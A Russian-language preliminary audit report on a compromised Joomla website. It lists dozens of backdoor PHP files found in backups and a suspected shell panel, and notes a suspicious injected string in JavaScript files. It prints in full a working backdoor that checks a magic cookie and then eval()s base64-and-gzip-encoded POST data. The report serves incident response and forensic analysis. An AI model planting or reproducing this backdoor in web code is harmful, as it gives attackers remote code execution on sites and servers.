Предварительный отчёт составленный нами - xn

plumpbustlingInternet και Εφαρμογές Web

4 Δεκ 2013 (πριν από 3 χρόνια και 8 μήνες)

100 εμφανίσεις

Предварительный отчёт аудита сайта
X
.ru

Проведён аудит только файловой структуры на основе бекапов от
2013
-
05
-
07

и
2012
-
06
-
11


2.1)

Обнаружена странная «инъекция» во все
JS

файлы:

;;;;;;;;;;;;;;;;;;;;;;;;

На исследовании

Предполагается возможность замены данной

строки на «полезную нагрузку» в виде
вредоносного кода при помощи каких
-
то других механизмов (пока не установленных)


2.1)

БЕК

ДОРЫ
:

\
X
_2013
-
05
-
07
\
X
\
plugins
\
system
\
ac27a9bb6.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
c5e34d33.php

\
X
_2013
-
05
-
07
\
X
\
administrator
\
components
\
com_
banners
\
controllers
\
5ad48f28.php

\
X
_2013
-
05
-
07
\
X
\
administrator
\
components
\
com_chronocontact
\
excelwriter
\
PPS
\
6b646b0.php

\
X
_2013
-
05
-
07
\
X
\
administrator
\
components
\
com_config
\
views
\
application
\
tmpl
\
dcbcc723.php

\
X
_2013
-
05
-
07
\
X
\
administrator
\
components
\
com_jce
\
installer
\
adapters
\
a26064638.php

\
X
_2013
-
05
-
07
\
X
\
administrator
\
components
\
com_jforms
\
plugins
\
export
\
Sql
\
6fade6fc7.php

\
X
_2013
-
05
-
07
\
X
\
administrator
\
components
\
com_newsfeeds
\
tables
\
89ab71.php

\
X
_2013
-
05
-
07
\
X
\
administrator
\
modules
\
mod_menu
\
d1d42226.php

\
X
_2
013
-
05
-
07
\
X
\
administrator
\
modules
\
mod_toolbar
\
734ef5.php

\
X
_2013
-
05
-
07
\
X
\
administrator
\
templates
\
khepri
\
images
\
h_cherry
\
92b5047.php

\
X
_2013
-
05
-
07
\
X
\
cache
\
mod_php
\
02a4e.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_chronocontact
\
libraries
\
ba6e3ee.php

\
X
_2013
-
05
-
07
\
X
\
c
omponents
\
com_contact
\
views
\
category
\
tmpl
\
b62dc7.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_content
\
views
\
section
\
tmpl
\
7752ab8.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_content
\
.ixyaje.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_jce
\
css
\
e1f6.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_con
tent
\
fdc7b2.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_media
\
af0c4.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_poll
\
models
\
07d8a1b2.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_poll
\
models
\
b9a748b.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_poll
\
views
\
poll
\
tmpl
\
c142a.php

\
X
_2013
-
05
-
07
\
X
\
comp
onents
\
com_poll
\
9a3f304.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_weblinks
\
views
\
categories
\
tmpl
\
471e.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_weblinks
\
views
\
category
\
c78d8c2.php

\
X
_2013
-
05
-
07
\
X
\
components
\
com_weblinks
\
views
\
1927.php

\
X
_2013
-
05
-
07
\
X
\
images
\
6292ffcb0.ph
p

\
X
_2013
-
05
-
07
\
X
\
includes
\
PEAR
\
d6c59eb2.php

\
X
_2013
-
05
-
07
\
X
\
libraries
\
bitfolge
\
80ff6.php

\
X
_2013
-
05
-
07
\
X
\
libraries
\
domit
\
0bac.php

\
X
_2013
-
05
-
07
\
X
\
libraries
\
joomla
\
database
\
table
\
64d8.php

\
X
_2013
-
05
-
07
\
X
\
libraries
\
joomla
\
filesystem
\
archive
\
2fab17.php

\
X
_20
13
-
05
-
07
\
X
\
libraries
\
joomla
\
installer
\
a9296bf21a.php

\
X
_2013
-
05
-
07
\
X
\
libraries
\
joomla
\
user
\
3dae3.php

\
X
_2013
-
05
-
07
\
X
\
libraries
\
simplepie
\
idn
\
d1fb9e257.php

\
X
_2013
-
05
-
07
\
X
\
media
\
system
\
css
\
63e6f65.php

\
X
_2013
-
05
-
07
\
X
\
media
\
system
\
js
\
a1af9581.php

\
X
_2013
-
05
-
07
\
X
\
modules
\
mod_breadcrumbs
\
tmpl
\
4e874.php

\
X
_2013
-
05
-
07
\
X
\
modules
\
mod_login
\
tmpl
\
70372.php

\
X
_2013
-
05
-
07
\
X
\
modules
\
mod_stats
\
2e21d0d7.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
editors
\
jce
\
libraries
\
views
\
15ac4e31.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
editors
\
jce
\
tiny_mce
\
plugin
s
\
help
\
img
\
bb696fec1.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
editors
\
jce
\
tiny_mce
\
plugins
\
preview
\
tmpl
\
e68be406c.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
editors
\
jce
\
tiny_mce
\
plugins
\
spellchecker
\
19c2ce62.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
editors
\
jce
\
tiny_mce
\
plugins
\
38ed77218.php

\
X
_20
13
-
05
-
07
\
X
\
plugins
\
editors
\
jce
\
tiny_mce
\
themes
\
a1a957f7.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
editors
\
tinymce
\
jscripts
\
tiny_mce
\
plugins
\
advimage
\
567f430.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
editors
\
tinymce
\
jscripts
\
tiny_mce
\
plugins
\
layer
\
407853463a.php

\
X
_2013
-
05
-
07
\
X
\
plugin
s
\
system
\
modalizer
\
modals
\
colorbox
\
style2
\
images
\
d49ecb9b2.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
system
\
modalizer
\
modals
\
colorbox
\
style3
\
images
\
81410389.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
system
\
modalizer
\
modals
\
colorbox
\
style5
\
images
\
3c0c7c2.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
sy
stem
\
modalizer
\
modals
\
colorbox
\
09f436eaef.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
system
\
modalizer
\
modals
\
lytebox
\
styles
\
green
\
c066d907.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
system
\
ac27a9bb6.php

\
X
_2013
-
05
-
07
\
X
\
plugins
\
c5e34d33.php

\
X
_2013
-
05
-
07
\
X
\
templates
\
X
\
html
\
com_content
\
a
rticle
\
8ba36d6aa1.php

\
X
_2013
-
05
-
07
\
X
\
templates
\
X
\
b97dda2f1.php

\
X
_2013
-
05
-
07
\
X
\
tmp
\
install_4f2594fd28dff
\
extensions
\
15
\
plugins
\
system
\
modalizer
\
0cbb5f8.php

\
X
_2013
-
05
-
07
\
X
\
tmp
\
install_4f2594fd28dff
\
extensions
\
16
\
plugins
\
system
\
608c2.php

\
X
_2013
-
05
-
07
\
X
\
tm
p
\
install_4f2594fd28dff
\
extensions
\
language
\
admin
\
en
-
GB
\
a2a3e8871b.php

\
X
_2013
-
05
-
07
\
X
\
tmp
\
install_4f2594fd28dff
\
extensions
\
language
\
admin
\
pt
-
BR
\
8638184aba.php

\
X
_2013
-
05
-
07
\
X
\
tmp
\
install_4f2594fd28dff
\
framework
\
elements
\
all
\
53d97ae.php

\
X
_2013
-
05
-
07
\
X
\
tmp
\
install_4f2594fd28dff
\
framework
\
framework
\
15
\
plugins
\
b4873c29d.php

\
X
_2013
-
05
-
07
\
X
\
tmp
\
install_4f2594fd28dff
\
installer
\
language
\
admin
\
bg
-
BG
\
b9aff1.php

\
X
_2013
-
05
-
07
\
X
\
tmp
\
install_4f2594fd28dff
\
installer
\
language
\
admin
\
fr
-
FR
\
d4a7.php

Все файлы содержат один и тот же код (иногда с небольшими модификациями):

<?php

if(!empty($_COOKIE['__utma']) and
substr($_COOKIE['__utma'],0,16)=='3469825000034634'){

if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace('
','',urldeco
de($_POST['msg']))))){


echo '<textarea id=areatext>';


eval($msg);


echo '</textarea>bg';


exit;

}}

?>


Предположительно позволяет выполнить любой код, переданный удалённым сервером
(обладающим нужной кукой) на сервере. Может использоваться для загрузки «полезной
нагрузки», а так же премещения самого себя (для усложнения отслеживания в логах
сервера)



2.1)

Пусто
й файл (скорее всего ЭКС бекдор):

\
X
_2013
-
05
-
07
\
X
\
libraries
\
geshi
\
3898f30a3d.php




3)

Неизвестное

различие
:

\
X
_2013
-
05
-
07
\
X
\
administrator
\
cache
\
9b8ac9887872716cae1ceea4dea3bd58.spc




4)

НА ИССЛЕДОВАНИИ

\
X
_2013
-
05
-
07
\
X
\
plugins
\
editors
\
jce
\
tiny_mce
\
plugins
\
advc
ode
\
js
\
tokenizephp.js

содержит подозрительную функцию, используемую в бекдорах




5)

НА ИССЛЕДОВАНИИ

\
X
_2013
-
05
-
07
\
X
\
plugins
\
content
\
plugin_jw_ts
\
tabs_slides~.js

нет в годичном бекапе



6)

ПАНЕЛЬ ШЕЛЛА

(предположительно):

\
X
_2013
-
05
-
07
\
X
\
tmp
\
j.php